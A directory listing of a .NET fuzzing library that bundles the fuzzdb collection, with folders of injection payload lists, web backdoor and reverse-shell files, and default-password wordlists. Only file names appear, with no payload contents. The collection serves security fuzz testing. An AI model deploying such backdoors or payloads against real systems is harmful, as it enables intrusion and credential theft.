├── .github
└── workflows
│ ├── dotnetcore.yml
│ └── nuget-push.yml
├── .gitignore
├── DotnetModelFuzzing.sln
├── ExampleApp
├── ExampleApp.csproj
└── Program.cs
├── LICENSE
├── Manipulations
├── Manipulations
│ ├── CollectionManips
│ │ └── ListMemberDuplication.cs
│ ├── FuzzDbManipulation.cs
│ ├── IGenerationManipulation.cs
│ ├── IListManipulation.cs
│ ├── IManupulation.cs
│ ├── IMutationManipulation.cs
│ ├── Manipulation.cs
│ ├── Manipulations.csproj
│ ├── StringManips
│ │ ├── BasicStringGeneration.cs
│ │ ├── BasicStringMutation.cs
│ │ └── StringReplacement.cs
│ ├── VulnerabilityManips
│ │ ├── ControlCharInjection.cs
│ │ ├── FormatStringsInjection.cs
│ │ ├── JsonInjection.cs
│ │ ├── NoSqlInjection.cs
│ │ ├── SqlInjection.cs
│ │ └── XssInjection.cs
│ ├── base64encoder.ps1
│ └── fuzzdb
│ │ ├── README.md
│ │ ├── _copyright.txt
│ │ ├── _copyright.txt.base64
│ │ ├── attack
│ │ ├── README.md
│ │ ├── all-attacks
│ │ │ ├── all-attacks-unix.txt
│ │ │ ├── all-attacks-unix.txt.base64
│ │ │ ├── all-attacks-win.txt
│ │ │ ├── all-attacks-win.txt.base64
│ │ │ ├── all-attacks-xplatform.txt
│ │ │ └── all-attacks-xplatform.txt.base64
│ │ ├── business-logic
│ │ │ ├── CommonDebugParamNames.txt
│ │ │ ├── CommonDebugParamNames.txt.base64
│ │ │ ├── CommonMethodNames.txt
│ │ │ ├── CommonMethodNames.txt.base64
│ │ │ ├── DebugParams.Json.fuzz.txt
│ │ │ └── DebugParams.Json.fuzz.txt.base64
│ │ ├── control-chars
│ │ │ ├── HexValsAllBytes.txt
│ │ │ ├── HexValsAllBytes.txt.base64
│ │ │ ├── NullByteRepresentations.txt
│ │ │ ├── NullByteRepresentations.txt.base64
│ │ │ ├── imessage.txt
│ │ │ ├── imessage.txt.base64
│ │ │ ├── terminal-escape-codes.txt
│ │ │ └── terminal-escape-codes.txt.base64
│ │ ├── disclosure-directory
│ │ │ ├── directory-indexing-generic.txt
│ │ │ └── directory-indexing-generic.txt.base64
│ │ ├── disclosure-localpaths
│ │ │ └── unix
│ │ │ │ ├── common-unix-httpd-log-locations.txt
│ │ │ │ └── common-unix-httpd-log-locations.txt.base64
│ │ ├── disclosure-source
│ │ │ ├── README.md
│ │ │ ├── source-disc-cmd-exec-traversal.txt
│ │ │ ├── source-disc-cmd-exec-traversal.txt.base64
│ │ │ ├── source-disclosure-generic.txt
│ │ │ ├── source-disclosure-generic.txt.base64
│ │ │ ├── source-disclosure-microsoft.txt
│ │ │ └── source-disclosure-microsoft.txt.base64
│ │ ├── email
│ │ │ ├── invalid-email-addresses.txt
│ │ │ ├── invalid-email-addresses.txt.base64
│ │ │ ├── valid-email-addresses.txt
│ │ │ └── valid-email-addresses.txt.base64
│ │ ├── file-upload
│ │ │ ├── README.md
│ │ │ ├── alt-extensions-asp.txt
│ │ │ ├── alt-extensions-asp.txt.base64
│ │ │ ├── alt-extensions-coldfusion.txt
│ │ │ ├── alt-extensions-coldfusion.txt.base64
│ │ │ ├── alt-extensions-jsp.txt
│ │ │ ├── alt-extensions-jsp.txt.base64
│ │ │ ├── alt-extensions-perl.txt
│ │ │ ├── alt-extensions-perl.txt.base64
│ │ │ ├── alt-extensions-php.txt
│ │ │ ├── alt-extensions-php.txt.base64
│ │ │ ├── file-ul-filter-bypass-commonly-writable-directories.txt
│ │ │ ├── file-ul-filter-bypass-commonly-writable-directories.txt.base64
│ │ │ ├── file-ul-filter-bypass-microsoft-asp-filetype-bf.txt
│ │ │ ├── file-ul-filter-bypass-microsoft-asp-filetype-bf.txt.base64
│ │ │ ├── file-ul-filter-bypass-microsoft-asp.txt
│ │ │ ├── file-ul-filter-bypass-microsoft-asp.txt.base64
│ │ │ ├── file-ul-filter-bypass-ms-php.txt
│ │ │ ├── file-ul-filter-bypass-ms-php.txt.base64
│ │ │ ├── file-ul-filter-bypass-x-platform-generic.txt
│ │ │ ├── file-ul-filter-bypass-x-platform-generic.txt.base64
│ │ │ ├── file-ul-filter-bypass-x-platform-php.txt
│ │ │ ├── file-ul-filter-bypass-x-platform-php.txt.base64
│ │ │ ├── invalid-filenames-linux.txt
│ │ │ ├── invalid-filenames-linux.txt.base64
│ │ │ ├── invalid-filenames-microsoft.txt
│ │ │ ├── invalid-filenames-microsoft.txt.base64
│ │ │ ├── invalid-filesystem-chars-microsoft.txt
│ │ │ ├── invalid-filesystem-chars-microsoft.txt.base64
│ │ │ ├── invalid-filesystem-chars-osx.txt
│ │ │ ├── invalid-filesystem-chars-osx.txt.base64
│ │ │ └── malicious-images
│ │ │ │ ├── POC_img_phpinfo-CR.gif
│ │ │ │ ├── POC_img_phpinfo-LF-CR.gif
│ │ │ │ ├── POC_phpinfo-metadata.gif
│ │ │ │ ├── POC_phpinfo-metadata.jpg
│ │ │ │ ├── README.md
│ │ │ │ ├── lottapixel.jpg
│ │ │ │ ├── uber.gif
│ │ │ │ └── xssproject.swf
│ │ ├── format-strings
│ │ │ ├── format-strings.txt
│ │ │ └── format-strings.txt.base64
│ │ ├── html_js_fuzz
│ │ │ ├── HTML5sec_Injections.txt
│ │ │ ├── HTML5sec_Injections.txt.base64
│ │ │ ├── html_attributes.txt
│ │ │ ├── html_attributes.txt.base64
│ │ │ ├── html_tags.txt
│ │ │ ├── html_tags.txt.base64
│ │ │ ├── javascript_events.txt
│ │ │ ├── javascript_events.txt.base64
│ │ │ ├── js_inject.txt
│ │ │ ├── js_inject.txt.base64
│ │ │ ├── quotationmarks.txt
│ │ │ └── quotationmarks.txt.base64
│ │ ├── http-protocol
│ │ │ ├── README.md
│ │ │ ├── crlf-injection.txt
│ │ │ ├── crlf-injection.txt.base64
│ │ │ ├── docs.http-method-defs.html
│ │ │ ├── hpp.txt
│ │ │ ├── hpp.txt.base64
│ │ │ ├── http-header-cache-poison.txt
│ │ │ ├── http-header-cache-poison.txt.base64
│ │ │ ├── http-protocol-methods.txt
│ │ │ ├── http-protocol-methods.txt.base64
│ │ │ ├── http-request-header-field-names.txt
│ │ │ ├── http-request-header-field-names.txt.base64
│ │ │ ├── http-response-header-field-names.txt
│ │ │ ├── http-response-header-field-names.txt.base64
│ │ │ ├── known-uri-types.txt
│ │ │ ├── known-uri-types.txt.base64
│ │ │ ├── user-agents.txt
│ │ │ └── user-agents.txt.base64
│ │ ├── integer-overflow
│ │ │ ├── integer-overflows.txt
│ │ │ └── integer-overflows.txt.base64
│ │ ├── ip
│ │ │ ├── localhost.txt
│ │ │ └── localhost.txt.base64
│ │ ├── json
│ │ │ ├── JSON_Fuzzing.txt
│ │ │ └── JSON_Fuzzing.txt.base64
│ │ ├── ldap
│ │ │ ├── README.md
│ │ │ ├── ldap-injection.txt
│ │ │ └── ldap-injection.txt.base64
│ │ ├── lfi
│ │ │ ├── JHADDIX_LFI.txt
│ │ │ ├── JHADDIX_LFI.txt.base64
│ │ │ ├── README.md
│ │ │ ├── common-ms-httpd-log-locations.txt
│ │ │ ├── common-ms-httpd-log-locations.txt.base64
│ │ │ ├── common-unix-httpd-log-locations.txt
│ │ │ └── common-unix-httpd-log-locations.txt.base64
│ │ ├── mimetypes
│ │ │ ├── MimeTypes.txt
│ │ │ └── MimeTypes.txt.base64
│ │ ├── no-sql-injection
│ │ │ ├── Readme.md
│ │ │ ├── mongodb.txt
│ │ │ └── mongodb.txt.base64
│ │ ├── os-cmd-execution
│ │ │ ├── Commands-Linux.txt
│ │ │ ├── Commands-Linux.txt.base64
│ │ │ ├── Commands-OSX.txt
│ │ │ ├── Commands-OSX.txt.base64
│ │ │ ├── Commands-Windows.txt
│ │ │ ├── Commands-Windows.txt.base64
│ │ │ ├── Commands-WindowsPowershell.txt
│ │ │ ├── Commands-WindowsPowershell.txt.base64
│ │ │ ├── OSCommandInject.Windows.txt
│ │ │ ├── OSCommandInject.Windows.txt.base64
│ │ │ ├── README.md
│ │ │ ├── command-execution-unix.txt
│ │ │ ├── command-execution-unix.txt.base64
│ │ │ ├── command-injection-template.txt
│ │ │ ├── command-injection-template.txt.base64
│ │ │ ├── shell-delimiters.txt
│ │ │ ├── shell-delimiters.txt.base64
│ │ │ ├── shell-operators.txt
│ │ │ ├── shell-operators.txt.base64
│ │ │ ├── source-disc-cmd-exec-traversal.txt
│ │ │ ├── source-disc-cmd-exec-traversal.txt.base64
│ │ │ ├── useful-commands-unix.txt
│ │ │ ├── useful-commands-unix.txt.base64
│ │ │ ├── useful-commands-windows.txt
│ │ │ └── useful-commands-windows.txt.base64
│ │ ├── os-dir-indexing
│ │ │ ├── directory-indexing.txt
│ │ │ └── directory-indexing.txt.base64
│ │ ├── path-traversal
│ │ │ ├── README.md
│ │ │ ├── path-traversal-windows.txt
│ │ │ ├── path-traversal-windows.txt.base64
│ │ │ ├── traversals-8-deep-exotic-encoding.txt
│ │ │ └── traversals-8-deep-exotic-encoding.txt.base64
│ │ ├── redirect
│ │ │ ├── README.md
│ │ │ ├── redirect-injection-template.txt
│ │ │ ├── redirect-injection-template.txt.base64
│ │ │ ├── redirect-urls-template.txt
│ │ │ └── redirect-urls-template.txt.base64
│ │ ├── rfi
│ │ │ ├── README.md
│ │ │ ├── rfi.txt
│ │ │ └── rfi.txt.base64
│ │ ├── server-side-include
│ │ │ ├── server-side-includes-generic.txt
│ │ │ └── server-side-includes-generic.txt.base64
│ │ ├── sql-injection
│ │ │ ├── detect
│ │ │ │ ├── GenericBlind.txt
│ │ │ │ ├── GenericBlind.txt.base64
│ │ │ │ ├── Generic_SQLI.txt
│ │ │ │ ├── Generic_SQLI.txt.base64
│ │ │ │ ├── MSSQL.txt
│ │ │ │ ├── MSSQL.txt.base64
│ │ │ │ ├── MSSQL_blind.txt
│ │ │ │ ├── MSSQL_blind.txt.base64
│ │ │ │ ├── MySQL.txt
│ │ │ │ ├── MySQL.txt.base64
│ │ │ │ ├── MySQL_MSSQL.txt
│ │ │ │ ├── MySQL_MSSQL.txt.base64
│ │ │ │ ├── README.md
│ │ │ │ ├── oracle.txt
│ │ │ │ ├── oracle.txt.base64
│ │ │ │ ├── xplatform.txt
│ │ │ │ └── xplatform.txt.base64
│ │ │ ├── exploit
│ │ │ │ ├── README.md
│ │ │ │ ├── db2-enumeration.txt
│ │ │ │ ├── db2-enumeration.txt.base64
│ │ │ │ ├── ms-sql-enumeration.txt
│ │ │ │ ├── ms-sql-enumeration.txt.base64
│ │ │ │ ├── mysql-injection-login-bypass.txt
│ │ │ │ ├── mysql-injection-login-bypass.txt.base64
│ │ │ │ ├── mysql-read-local-files.txt
│ │ │ │ ├── mysql-read-local-files.txt.base64
│ │ │ │ ├── postgres-enumeration.txt
│ │ │ │ └── postgres-enumeration.txt.base64
│ │ │ └── payloads-sql-blind
│ │ │ │ ├── README.md
│ │ │ │ ├── payloads-sql-blind-MSSQL-INSERT.txt
│ │ │ │ ├── payloads-sql-blind-MSSQL-INSERT.txt.base64
│ │ │ │ ├── payloads-sql-blind-MSSQL-WHERE.txt
│ │ │ │ ├── payloads-sql-blind-MSSQL-WHERE.txt.base64
│ │ │ │ ├── payloads-sql-blind-MySQL-INSERT.txt
│ │ │ │ ├── payloads-sql-blind-MySQL-INSERT.txt.base64
│ │ │ │ ├── payloads-sql-blind-MySQL-ORDER_BY.txt
│ │ │ │ ├── payloads-sql-blind-MySQL-ORDER_BY.txt.base64
│ │ │ │ ├── payloads-sql-blind-MySQL-WHERE.txt
│ │ │ │ └── payloads-sql-blind-MySQL-WHERE.txt.base64
│ │ ├── string-expansion
│ │ │ ├── shell-expansion.txt
│ │ │ └── shell-expansion.txt.base64
│ │ ├── unicode
│ │ │ ├── README.md
│ │ │ ├── corrupted.txt
│ │ │ ├── corrupted.txt.base64
│ │ │ ├── emoji.txt
│ │ │ ├── emoji.txt.base64
│ │ │ ├── japanese-emoticon.txt
│ │ │ ├── japanese-emoticon.txt.base64
│ │ │ ├── naughty-unicode.txt
│ │ │ ├── naughty-unicode.txt.base64
│ │ │ ├── regionalindicators.txt
│ │ │ ├── regionalindicators.txt.base64
│ │ │ ├── right-to-left.txt
│ │ │ ├── right-to-left.txt.base64
│ │ │ ├── specialchars.txt
│ │ │ ├── specialchars.txt.base64
│ │ │ ├── two-byte-chars.txt
│ │ │ ├── two-byte-chars.txt.base64
│ │ │ ├── upsidedown.txt
│ │ │ └── upsidedown.txt.base64
│ │ ├── xml
│ │ │ ├── xml-attacks.txt
│ │ │ └── xml-attacks.txt.base64
│ │ ├── xpath
│ │ │ ├── README.md
│ │ │ ├── xpath-injection.txt
│ │ │ └── xpath-injection.txt.base64
│ │ └── xss
│ │ │ ├── JHADDIX_XSS_WITH_CONTEXT.doc.txt
│ │ │ ├── JHADDIX_XSS_WITH_CONTEXT.doc.txt.base64
│ │ │ ├── README.md
│ │ │ ├── XSSPolyglot.txt
│ │ │ ├── XSSPolyglot.txt.base64
│ │ │ ├── all-encodings-of-lt.txt
│ │ │ ├── all-encodings-of-lt.txt.base64
│ │ │ ├── default-javascript-event-attributes.txt
│ │ │ ├── default-javascript-event-attributes.txt.base64
│ │ │ ├── html-event-attributes.txt
│ │ │ ├── html-event-attributes.txt.base64
│ │ │ ├── test.xxe
│ │ │ ├── xss-other.txt
│ │ │ ├── xss-other.txt.base64
│ │ │ ├── xss-rsnake.txt
│ │ │ ├── xss-rsnake.txt.base64
│ │ │ ├── xss-uri.txt
│ │ │ └── xss-uri.txt.base64
│ │ ├── discovery
│ │ ├── UserAgent
│ │ │ ├── UserAgentListCommon.txt
│ │ │ ├── UserAgentListCommon.txt.base64
│ │ │ ├── UserAgentListLarge.txt
│ │ │ ├── UserAgentListLarge.txt.base64
│ │ │ ├── UserAgents.txt
│ │ │ └── UserAgents.txt.base64
│ │ ├── dns
│ │ │ ├── CcTLD.txt
│ │ │ ├── CcTLD.txt.base64
│ │ │ ├── alexaTop1mAXFRcommonSubdomains.txt
│ │ │ ├── alexaTop1mAXFRcommonSubdomains.txt.base64
│ │ │ ├── dnsmapCommonSubdomains.txt
│ │ │ ├── dnsmapCommonSubdomains.txt.base64
│ │ │ ├── gTLD.txt
│ │ │ └── gTLD.txt.base64
│ │ └── predictable-filepaths
│ │ │ ├── KitchensinkDirectories.txt
│ │ │ ├── KitchensinkDirectories.txt.base64
│ │ │ ├── Randomfiles.txt
│ │ │ ├── Randomfiles.txt.base64
│ │ │ ├── UnixDotfiles.txt
│ │ │ ├── UnixDotfiles.txt.base64
│ │ │ ├── backdoors
│ │ │ ├── ASP_CommonBackdoors.txt
│ │ │ ├── ASP_CommonBackdoors.txt.base64
│ │ │ ├── bot_control_panels.txt
│ │ │ ├── bot_control_panels.txt.base64
│ │ │ ├── shells.txt
│ │ │ └── shells.txt.base64
│ │ │ ├── cgi
│ │ │ ├── CGI_HTTP_POST.txt
│ │ │ ├── CGI_HTTP_POST.txt.base64
│ │ │ ├── CGI_HTTP_POST_Windows.txt
│ │ │ ├── CGI_HTTP_POST_Windows.txt.base64
│ │ │ ├── CGI_Microsoft.txt
│ │ │ ├── CGI_Microsoft.txt.base64
│ │ │ ├── CGI_XPlatform.txt
│ │ │ └── CGI_XPlatform.txt.base64
│ │ │ ├── cms
│ │ │ ├── README.md
│ │ │ ├── drupal_plugins.txt
│ │ │ ├── drupal_plugins.txt.base64
│ │ │ ├── drupal_themes.txt
│ │ │ ├── drupal_themes.txt.base64
│ │ │ ├── joomla_plugins.txt
│ │ │ ├── joomla_plugins.txt.base64
│ │ │ ├── joomla_themes.txt
│ │ │ ├── joomla_themes.txt.base64
│ │ │ ├── php-nuke.txt
│ │ │ ├── php-nuke.txt.base64
│ │ │ ├── wordpress.txt
│ │ │ ├── wordpress.txt.base64
│ │ │ ├── wp_common_theme_files.txt
│ │ │ ├── wp_common_theme_files.txt.base64
│ │ │ ├── wp_plugins.txt
│ │ │ ├── wp_plugins.txt.base64
│ │ │ ├── wp_plugins_top225.txt
│ │ │ ├── wp_plugins_top225.txt.base64
│ │ │ ├── wp_themes.readme
│ │ │ ├── wp_themes.txt
│ │ │ └── wp_themes.txt.base64
│ │ │ ├── filename-dirname-bruteforce
│ │ │ ├── 3CharExtBrute.txt
│ │ │ ├── 3CharExtBrute.txt.base64
│ │ │ ├── CommonWebExtensions.txt
│ │ │ ├── CommonWebExtensions.txt.base64
│ │ │ ├── Extensions.Backup.txt
│ │ │ ├── Extensions.Backup.txt.base64
│ │ │ ├── Extensions.Common.txt
│ │ │ ├── Extensions.Common.txt.base64
│ │ │ ├── Extensions.Compressed.txt
│ │ │ ├── Extensions.Compressed.txt.base64
│ │ │ ├── Extensions.Mostcommon.txt
│ │ │ ├── Extensions.Mostcommon.txt.base64
│ │ │ ├── Extensions.Skipfish.txt
│ │ │ ├── Extensions.Skipfish.txt.base64
│ │ │ ├── WordlistSkipfish.txt
│ │ │ ├── WordlistSkipfish.txt.base64
│ │ │ ├── copy_of.txt
│ │ │ ├── copy_of.txt.base64
│ │ │ ├── raft-large-directories-lowercase.txt
│ │ │ ├── raft-large-directories-lowercase.txt.base64
│ │ │ ├── raft-large-directories.txt
│ │ │ ├── raft-large-directories.txt.base64
│ │ │ ├── raft-large-extensions-lowercase.txt
│ │ │ ├── raft-large-extensions-lowercase.txt.base64
│ │ │ ├── raft-large-extensions.txt
│ │ │ ├── raft-large-extensions.txt.base64
│ │ │ ├── raft-large-files-lowercase.txt
│ │ │ ├── raft-large-files-lowercase.txt.base64
│ │ │ ├── raft-large-files.txt
│ │ │ ├── raft-large-files.txt.base64
│ │ │ ├── raft-large-words-lowercase.txt
│ │ │ ├── raft-large-words-lowercase.txt.base64
│ │ │ ├── raft-large-words.txt
│ │ │ ├── raft-large-words.txt.base64
│ │ │ ├── raft-medium-directories-lowercase.txt
│ │ │ ├── raft-medium-directories-lowercase.txt.base64
│ │ │ ├── raft-medium-directories.txt
│ │ │ ├── raft-medium-directories.txt.base64
│ │ │ ├── raft-medium-extensions-lowercase.txt
│ │ │ ├── raft-medium-extensions-lowercase.txt.base64
│ │ │ ├── raft-medium-extensions.txt
│ │ │ ├── raft-medium-extensions.txt.base64
│ │ │ ├── raft-medium-files-lowercase.txt
│ │ │ ├── raft-medium-files-lowercase.txt.base64
│ │ │ ├── raft-medium-files.txt
│ │ │ ├── raft-medium-files.txt.base64
│ │ │ ├── raft-medium-words-lowercase.txt
│ │ │ ├── raft-medium-words-lowercase.txt.base64
│ │ │ ├── raft-medium-words.txt
│ │ │ ├── raft-medium-words.txt.base64
│ │ │ ├── raft-small-directories-lowercase.txt
│ │ │ ├── raft-small-directories-lowercase.txt.base64
│ │ │ ├── raft-small-directories.txt
│ │ │ ├── raft-small-directories.txt.base64
│ │ │ ├── raft-small-extensions-lowercase.txt
│ │ │ ├── raft-small-extensions-lowercase.txt.base64
│ │ │ ├── raft-small-extensions.txt
│ │ │ ├── raft-small-extensions.txt.base64
│ │ │ ├── raft-small-files-lowercase.txt
│ │ │ ├── raft-small-files-lowercase.txt.base64
│ │ │ ├── raft-small-files.txt
│ │ │ ├── raft-small-files.txt.base64
│ │ │ ├── raft-small-words-lowercase.txt
│ │ │ ├── raft-small-words-lowercase.txt.base64
│ │ │ ├── raft-small-words.txt
│ │ │ ├── raft-small-words.txt.base64
│ │ │ ├── spanish.txt
│ │ │ ├── spanish.txt.base64
│ │ │ ├── test_demo.txt
│ │ │ ├── test_demo.txt.base64
│ │ │ ├── upload_variants.txt
│ │ │ └── upload_variants.txt.base64
│ │ │ ├── login-file-locations
│ │ │ ├── Logins.txt
│ │ │ ├── Logins.txt.base64
│ │ │ ├── cfm.txt
│ │ │ ├── cfm.txt.base64
│ │ │ ├── html.txt
│ │ │ ├── html.txt.base64
│ │ │ ├── jsp.txt
│ │ │ ├── jsp.txt.base64
│ │ │ ├── php.txt
│ │ │ ├── php.txt.base64
│ │ │ ├── windows-asp.txt
│ │ │ ├── windows-asp.txt.base64
│ │ │ ├── windows-aspx.txt
│ │ │ └── windows-aspx.txt.base64
│ │ │ ├── password-file-locations
│ │ │ ├── Passwords.txt
│ │ │ └── Passwords.txt.base64
│ │ │ ├── php
│ │ │ ├── PHP.txt
│ │ │ ├── PHP.txt.base64
│ │ │ ├── PHP_CommonBackdoors.txt
│ │ │ └── PHP_CommonBackdoors.txt.base64
│ │ │ ├── proxy-conf.txt
│ │ │ ├── proxy-conf.txt.base64
│ │ │ ├── tftp.txt
│ │ │ ├── tftp.txt.base64
│ │ │ ├── webservers-appservers
│ │ │ ├── ADFS.txt
│ │ │ ├── ADFS.txt.base64
│ │ │ ├── AdobeXML.txt
│ │ │ ├── AdobeXML.txt.base64
│ │ │ ├── Apache.txt
│ │ │ ├── Apache.txt.base64
│ │ │ ├── ApacheTomcat.txt
│ │ │ ├── ApacheTomcat.txt.base64
│ │ │ ├── Apache_Axis.txt
│ │ │ ├── Apache_Axis.txt.base64
│ │ │ ├── ColdFusion.txt
│ │ │ ├── ColdFusion.txt.base64
│ │ │ ├── FatwireCMS.txt
│ │ │ ├── FatwireCMS.txt.base64
│ │ │ ├── Frontpage.txt
│ │ │ ├── Frontpage.txt.base64
│ │ │ ├── HP_System_Mgmt_Homepage.txt
│ │ │ ├── HP_System_Mgmt_Homepage.txt.base64
│ │ │ ├── HTTP_POST_Microsoft.txt
│ │ │ ├── HTTP_POST_Microsoft.txt.base64
│ │ │ ├── Hyperion.txt
│ │ │ ├── Hyperion.txt.base64
│ │ │ ├── IIS.txt
│ │ │ ├── IIS.txt.base64
│ │ │ ├── JBoss.txt
│ │ │ ├── JBoss.txt.base64
│ │ │ ├── JRun.txt
│ │ │ ├── JRun.txt.base64
│ │ │ ├── JavaServlets_Common.txt
│ │ │ ├── JavaServlets_Common.txt.base64
│ │ │ ├── Joomla_exploitable.txt
│ │ │ ├── Joomla_exploitable.txt.base64
│ │ │ ├── LotusNotes.txt
│ │ │ ├── LotusNotes.txt.base64
│ │ │ ├── Netware.txt
│ │ │ ├── Netware.txt.base64
│ │ │ ├── Oracle9i.txt
│ │ │ ├── Oracle9i.txt.base64
│ │ │ ├── OracleAppServer.txt
│ │ │ ├── OracleAppServer.txt.base64
│ │ │ ├── README.md
│ │ │ ├── Ruby_Rails.txt
│ │ │ ├── Ruby_Rails.txt.base64
│ │ │ ├── SAP.txt
│ │ │ ├── SAP.txt.base64
│ │ │ ├── Sharepoint.txt
│ │ │ ├── Sharepoint.txt.base64
│ │ │ ├── SiteMinder.txt
│ │ │ ├── SiteMinder.txt.base64
│ │ │ ├── SunAppServerGlassfish.txt
│ │ │ ├── SunAppServerGlassfish.txt.base64
│ │ │ ├── SuniPlanet.txt
│ │ │ ├── SuniPlanet.txt.base64
│ │ │ ├── Vignette.txt
│ │ │ ├── Vignette.txt.base64
│ │ │ ├── Weblogic.txt
│ │ │ ├── Weblogic.txt.base64
│ │ │ ├── Websphere.txt
│ │ │ └── Websphere.txt.base64
│ │ │ ├── wellknown-rfc5785.txt
│ │ │ └── wellknown-rfc5785.txt.base64
│ │ ├── docs
│ │ ├── attack-docs
│ │ │ ├── remote-cmd-exfiltration
│ │ │ │ ├── Web-Shells-rev2.pdf
│ │ │ │ ├── netcat_cheat_sheet_v1.pdf
│ │ │ │ └── windows_command_line_sheet_v1.pdf
│ │ │ ├── rfi-cheatsheet.html
│ │ │ ├── source-directory-file-indexing-cheatsheet.html
│ │ │ ├── sqli
│ │ │ │ ├── docs.oracle_cheat.pdf
│ │ │ │ └── docs.sql_injection_cheatsheet.html
│ │ │ ├── waf-bypass
│ │ │ │ └── regexp-security-cheatsheet.md
│ │ │ └── xss
│ │ │ │ └── docs.wasc-scriptmapping
│ │ │ │ ├── ScriptMapping_Release_26Nov2007.html
│ │ │ │ ├── images
│ │ │ │ ├── ff2.png
│ │ │ │ ├── ie7.png
│ │ │ │ └── safari3.png
│ │ │ │ ├── license.txt
│ │ │ │ └── license.txt.base64
│ │ └── misc
│ │ │ ├── KL0209LIT_fffap.html
│ │ │ ├── Web-Shells-rev2.pdf
│ │ │ ├── Wireshark_Display_Filters.pdf
│ │ │ └── htmlcodes-cheatsheet.htm
│ │ ├── regex
│ │ ├── README.md
│ │ ├── amazon.txt
│ │ ├── amazon.txt.base64
│ │ ├── breakpoint-ignores.txt
│ │ ├── breakpoint-ignores.txt.base64
│ │ ├── errors.txt
│ │ ├── errors.txt.base64
│ │ ├── nsa-wordlist.txt
│ │ ├── nsa-wordlist.txt.base64
│ │ ├── pii.readme.txt
│ │ ├── pii.readme.txt.base64
│ │ ├── pii.txt
│ │ ├── pii.txt.base64
│ │ ├── sessionid.txt
│ │ └── sessionid.txt.base64
│ │ ├── web-backdoors
│ │ ├── README.md
│ │ ├── asp
│ │ │ ├── cmd.asp
│ │ │ ├── dns.asp
│ │ │ ├── file.asp
│ │ │ ├── list.asp
│ │ │ ├── list.txt
│ │ │ ├── list.txt.base64
│ │ │ ├── proxy.asp
│ │ │ ├── shell.aspx
│ │ │ └── up.asp
│ │ ├── c
│ │ │ └── cmd.c
│ │ ├── cfm
│ │ │ ├── cfSQL.cfm
│ │ │ ├── cmd.cfm
│ │ │ └── shell.cfm
│ │ ├── exe
│ │ │ └── nc.exe
│ │ ├── jsp
│ │ │ ├── CmdServlet.class
│ │ │ ├── CmdServlet.java
│ │ │ ├── ListServlet.class
│ │ │ ├── ListServlet.java
│ │ │ ├── UpServlet.class
│ │ │ ├── UpServlet.java
│ │ │ ├── jsp-reverse.jsp
│ │ │ ├── laudanum
│ │ │ │ ├── cmd.war
│ │ │ │ ├── makewar.sh
│ │ │ │ └── warfiles
│ │ │ │ │ ├── META-INF
│ │ │ │ │ └── MANIFEST.MF
│ │ │ │ │ └── WEB-INF
│ │ │ │ │ └── web.xml
│ │ │ ├── list.jsp
│ │ │ ├── up.jsp
│ │ │ └── win32
│ │ │ │ ├── cmd_win32.jsp
│ │ │ │ └── up_win32.jsp
│ │ ├── php
│ │ │ ├── cmd.php
│ │ │ ├── dns.php
│ │ │ ├── file.php
│ │ │ ├── host.php
│ │ │ ├── killnc.php
│ │ │ ├── list.php
│ │ │ ├── proxy.php
│ │ │ ├── shell.php
│ │ │ └── up.php
│ │ ├── pl-cgi
│ │ │ ├── cmd.pl
│ │ │ ├── list.pl
│ │ │ ├── perlcmd.cgi
│ │ │ └── up.pl
│ │ ├── servlet
│ │ │ ├── CmdServlet.java
│ │ │ ├── ListServlet.java
│ │ │ └── UpServlet.java
│ │ ├── sh
│ │ │ ├── cmd.sh
│ │ │ ├── list.sh
│ │ │ └── up.sh
│ │ └── wordpress
│ │ │ ├── laudanum.php
│ │ │ └── templates
│ │ │ ├── README.md
│ │ │ ├── dns.php
│ │ │ ├── file.php
│ │ │ ├── host.php
│ │ │ ├── ipcheck.php
│ │ │ ├── killnc.php
│ │ │ ├── proxy.php
│ │ │ ├── settings.php
│ │ │ └── shell.php
│ │ ├── wordlists-misc
│ │ ├── accidental_profanity.txt
│ │ ├── accidental_profanity.txt.base64
│ │ ├── common-http-ports.txt
│ │ ├── common-http-ports.txt.base64
│ │ ├── numeric.txt
│ │ ├── numeric.txt.base64
│ │ ├── us_cities.txt
│ │ ├── us_cities.txt.base64
│ │ ├── wordlist-alphanumeric-case.txt
│ │ ├── wordlist-alphanumeric-case.txt.base64
│ │ ├── wordlist-common-snmp-community-strings.txt
│ │ ├── wordlist-common-snmp-community-strings.txt.base64
│ │ ├── wordlist-dna.txt
│ │ └── wordlist-dna.txt.base64
│ │ └── wordlists-user-passwd
│ │ ├── db2
│ │ ├── db2_default_pass.txt
│ │ ├── db2_default_pass.txt.base64
│ │ ├── db2_default_user.txt
│ │ ├── db2_default_user.txt.base64
│ │ ├── db2_default_userpass.txt
│ │ └── db2_default_userpass.txt.base64
│ │ ├── faithwriters.txt
│ │ ├── faithwriters.txt.base64
│ │ ├── generic-listpairs
│ │ ├── http_default_pass.txt
│ │ ├── http_default_pass.txt.base64
│ │ ├── http_default_userpass.txt
│ │ ├── http_default_userpass.txt.base64
│ │ ├── http_default_users.txt
│ │ └── http_default_users.txt.base64
│ │ ├── names
│ │ ├── namelist.txt
│ │ └── namelist.txt.base64
│ │ ├── oracle
│ │ ├── _hci_oracle_passwords.txt
│ │ ├── _hci_oracle_passwords.txt.base64
│ │ ├── _oracle_default_passwords.txt
│ │ ├── _oracle_default_passwords.txt.base64
│ │ ├── oracle_login_password.txt
│ │ ├── oracle_login_password.txt.base64
│ │ ├── oracle_logins.txt
│ │ ├── oracle_logins.txt.base64
│ │ ├── oracle_passwords.txt
│ │ └── oracle_passwords.txt.base64
│ │ ├── passwds
│ │ ├── john.txt
│ │ ├── john.txt.base64
│ │ ├── phpbb.txt
│ │ ├── phpbb.txt.base64
│ │ ├── twitter.txt
│ │ ├── twitter.txt.base64
│ │ ├── weaksauce.txt
│ │ └── weaksauce.txt.base64
│ │ ├── postgres
│ │ ├── postgres_default_pass.txt
│ │ ├── postgres_default_pass.txt.base64
│ │ ├── postgres_default_user.txt
│ │ ├── postgres_default_user.txt.base64
│ │ ├── postgres_default_userpass.txt
│ │ └── postgres_default_userpass.txt.base64
│ │ ├── readme.txt
│ │ ├── readme.txt.base64
│ │ ├── tomcat
│ │ ├── tomcat_mgr_default_pass.txt
│ │ ├── tomcat_mgr_default_pass.txt.base64
│ │ ├── tomcat_mgr_default_userpass.txt
│ │ ├── tomcat_mgr_default_userpass.txt.base64
│ │ ├── tomcat_mgr_default_users.txt
│ │ └── tomcat_mgr_default_users.txt.base64
│ │ └── unix-os
│ │ ├── unix_passwords.txt
│ │ ├── unix_passwords.txt.base64
│ │ ├── unix_users.txt
│ │ └── unix_users.txt.base64
└── ManipulationsTests
│ ├── BasicStringGenerationTests.cs
